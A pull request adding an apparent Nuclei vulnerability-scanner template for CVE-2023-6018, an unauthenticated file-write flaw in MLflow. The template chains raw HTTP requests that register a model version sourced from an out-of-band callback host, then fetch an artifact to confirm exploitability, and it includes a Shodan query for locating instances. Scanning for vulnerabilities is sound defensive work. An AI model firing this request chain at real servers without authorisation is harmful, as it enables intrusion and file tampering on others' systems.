Merge pull request #8765 from clem9669/main

Create CVE-2023-6018.yaml

http/cves/2023/CVE-2023-6018.yaml

@@ -0,0 +1,68 @@
+id: CVE-2023-6018
+
+info:
+  name: Mlflow - Arbitrary File Write
+  author: byt3bl33d3r
+  severity: critical
+  description: |
+    An attacker can overwrite any file on the server hosting MLflow without any authentication.
+  reference:
+    - https://huntr.com/bounties/7cf918b5-43f4-48c0-a371-4d963ce69b30/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-6018
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-6018
+    cwe-id: CWE-78
+    epss-score: 0.00102
+    epss-percentile: 0.41283
+    cpe: cpe:2.3:a:lfprojects:mlflow:-:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: http.title:"mlflow"
+  tags: cve,cve2023,mlflow,oss,rce
+
+variables:
+  model_name: "{{rand_text_alpha(6)}}"
+
+http:
+  - raw:
+      - |
+        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{model_name}}"}
+
+      - |
+        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{model_name}}", "source": "http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/"}
+
+      - |
+        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{model_name}}", "source": "models:/{{model_name}}/1"}
+
+      - |
+        GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: body_1
+        words:
+          - '"registered_model":'
+          - '"name":'
+        condition: and